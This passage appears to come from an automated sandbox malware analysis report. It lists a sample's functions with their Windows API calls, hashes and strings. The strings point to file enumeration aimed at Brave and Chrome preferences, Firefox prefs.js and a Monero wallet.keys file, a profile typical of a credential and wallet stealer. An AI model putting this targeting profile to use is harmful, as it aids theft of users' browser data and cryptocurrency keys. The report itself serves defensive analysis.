                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: a813f196920174c532dc9f4bd8118fb8112a79f5b34ba670f630d2a924ad9ce3
                                    • Instruction ID: fafd5f6d9c692211df66181cdd0679c822c51a6fbc76988b1520cf78892ebf17
                                    • Opcode Fuzzy Hash: a813f196920174c532dc9f4bd8118fb8112a79f5b34ba670f630d2a924ad9ce3
                                    • Instruction Fuzzy Hash: 8642A671A00148AFDB14FB71DD96EED737DAF8D300F414559B506A6182EF30AB49CBA2
                                    Function 000E4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000E492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E4943
                                    • StrCmpCA.SHLWAPI(?,000F0FDC), ref: 000E4971
                                    • StrCmpCA.SHLWAPI(?,000F0FE0), ref: 000E4987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E4B7D
                                    • FindClose.KERNEL32(000000FF), ref: 000E4B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 5665cfdfc2d41d5c31169a88651e50029e46ba3c67138832aa3e0778ec9959a8
                                    • Instruction ID: 56a874a50c035d4c7e239e657e483d238eb8fd38df9cfc3758be7faf91a48fad
                                    • Opcode Fuzzy Hash: 5665cfdfc2d41d5c31169a88651e50029e46ba3c67138832aa3e0778ec9959a8
                                    • Instruction Fuzzy Hash: 326146B1900618AFCB21EBA0DC45EFA77BCBB4C701F048598F609A6141EB75AB45CF91
                                    Function 000E4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E4580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E4587
                                    • wsprintfA.USER32 ref: 000E45A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E45BD
                                    • StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E45EB
                                    • StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E468B
                                    • FindClose.KERNEL32(000000FF), ref: 000E46A0
                                    • lstrcat.KERNEL32(?,00B812C8), ref: 000E46C5
                                    • lstrcat.KERNEL32(?,00B7FE60), ref: 000E46D8
                                    • lstrlen.KERNEL32(?), ref: 000E46E5
                                    • lstrlen.KERNEL32(?), ref: 000E46F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 20067cd23ed7abc6e65b97461e6159fdcfadc56cb3930d9ecfb67ed53ba62c19
                                    • Instruction ID: bdd9027de44d0c090a6f274559f2efaaef803ef340ba11e1e71dfef39425ff8f
                                    • Opcode Fuzzy Hash: 20067cd23ed7abc6e65b97461e6159fdcfadc56cb3930d9ecfb67ed53ba62c19
                                    • Instruction Fuzzy Hash: 00518AB1900218AFC721EBB0DC89FED777CAB5C301F408589F60996191EF749B848F92
                                    Function 000E3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000E3EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E3EDA
                                    • StrCmpCA.SHLWAPI(?,000F0FAC), ref: 000E3F08
                                    • StrCmpCA.SHLWAPI(?,000F0FB0), ref: 000E3F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E406C
                                    • FindClose.KERNEL32(000000FF), ref: 000E4081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 4c2116a5941b16f1a1f3eafd7c94af1249ed60229dbe48a9633cfd305f99f47e
                                    • Instruction ID: 09d1aa97b24ed708f7e942ac8f83f0e431ece8aa74466fa1e0cdcefa267a76ef
                                    • Opcode Fuzzy Hash: 4c2116a5941b16f1a1f3eafd7c94af1249ed60229dbe48a9633cfd305f99f47e
                                    • Instruction Fuzzy Hash: C45188B5900618AFCB25EBB0DC85EFA777CBB48301F04859CF359A6041DB759B898F51
                                    Function 000DED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000DED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000DED55
                                    • StrCmpCA.SHLWAPI(?,000F1538), ref: 000DEDAB
                                    • StrCmpCA.SHLWAPI(?,000F153C), ref: 000DEDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DF2AE
                                    • FindClose.KERNEL32(000000FF), ref: 000DF2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: bf95585dcb978cd8f9c6cc1c212d9a632832a272f59936b229264b8414bf3f67
                                    • Instruction ID: 4d8eaf803c0f1ac2fe540010c15f09b51933e967f37f74086dfaecb7fb21a043
                                    • Opcode Fuzzy Hash: bf95585dcb978cd8f9c6cc1c212d9a632832a272f59936b229264b8414bf3f67
                                    • Instruction Fuzzy Hash: 1CE15171A111589EEB54FB61DD92EEE7338AF59300F414199B10A72093EE307F8ACF62
                                    Function 000DF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F15B8,000F0D96), ref: 000DF71E
                                    • StrCmpCA.SHLWAPI(?,000F15BC), ref: 000DF76F
                                    • StrCmpCA.SHLWAPI(?,000F15C0), ref: 000DF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 000DFAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: a6c389b76d07982af09d1c04a06018b8485a456e8a9bad40a590b7eb35eb679c
                                    • Instruction ID: eb139ccd97db6679a247ce560e59405d95c9dbe64e00ad8ed895852ce7748f33
                                    • Opcode Fuzzy Hash: a6c389b76d07982af09d1c04a06018b8485a456e8a9bad40a590b7eb35eb679c
                                    • Instruction Fuzzy Hash: 2CB17671A002489FDB24FF61DD95AFD7379AF59300F0181A9A50AA7143EF306B49CFA2
                                    Function 000D16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F510C,?,?,?,000F51B4,?,?,00000000,?,00000000), ref: 000D1923
                                    • StrCmpCA.SHLWAPI(?,000F525C), ref: 000D1973
                                    • StrCmpCA.SHLWAPI(?,000F5304), ref: 000D1989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000D1D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 000D1DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000D1E20
                                    • FindClose.KERNEL32(000000FF), ref: 000D1E32
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: b82eff8642abaed2cb55538bd04df3a68107b6783a605489e0ea5307c130703a
                                    • Instruction ID: bece7929a923d49ef996997411bb5126089abfa236883130fa383409a58060b9
                                    • Opcode Fuzzy Hash: b82eff8642abaed2cb55538bd04df3a68107b6783a605489e0ea5307c130703a
                                    • Instruction Fuzzy Hash: 3A125F71A10158AFDB25EB61DD96AEE7379AF19300F414199B10A72093EF307F89CFA1
                                    Function 000DDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000F0C2E), ref: 000DDE5E
                                    • StrCmpCA.SHLWAPI(?,000F14C8), ref: 000DDEAE
                                    • StrCmpCA.SHLWAPI(?,000F14CC), ref: 000DDEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DE3E0
                                    • FindClose.KERNEL32(000000FF), ref: 000DE3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 50b7a629444c2330113a2d152a61e800617227bd4f70b82ef6c496fd5feaff2b
                                    • Instruction ID: e43aeee78b5712e461ffe7365119a8576d17eafb5f8e2bb18760fb77a4d67522
                                    • Opcode Fuzzy Hash: 50b7a629444c2330113a2d152a61e800617227bd4f70b82ef6c496fd5feaff2b
                                    • Instruction Fuzzy Hash: DCF1DD719101589EDB25FB61DD95AEE7339BF59300F81419AA10A72093EF307B8ACF62
                                    Function 000DDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F14B0,000F0C2A), ref: 000DDAEB
                                    • StrCmpCA.SHLWAPI(?,000F14B4), ref: 000DDB33
                                    • StrCmpCA.SHLWAPI(?,000F14B8), ref: 000DDB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DDDCC
                                    • FindClose.KERNEL32(000000FF), ref: 000DDDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: fddecd96b446f20ae6020bedac9384db40667f2eba32f22835423dd09530d05f
                                    • Instruction ID: 977408e3192152fb0c942f3e9fda15536a395d1eed1096d6b321a254f8e2401b
                                    • Opcode Fuzzy Hash: fddecd96b446f20ae6020bedac9384db40667f2eba32f22835423dd09530d05f
                                    • Instruction Fuzzy Hash: 4B915B72A002049BDB14FB71ED969FD737DAF8D300F418559F946A6142EE34AB0DCBA2
                                    Function 004A60AA Relevance: 11.6, Strings: 8, Instructions: 1613COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +e;5$=0$E[__$QxW$lm_$})$$_$Do6
                                    • API String ID: 0-1181617521
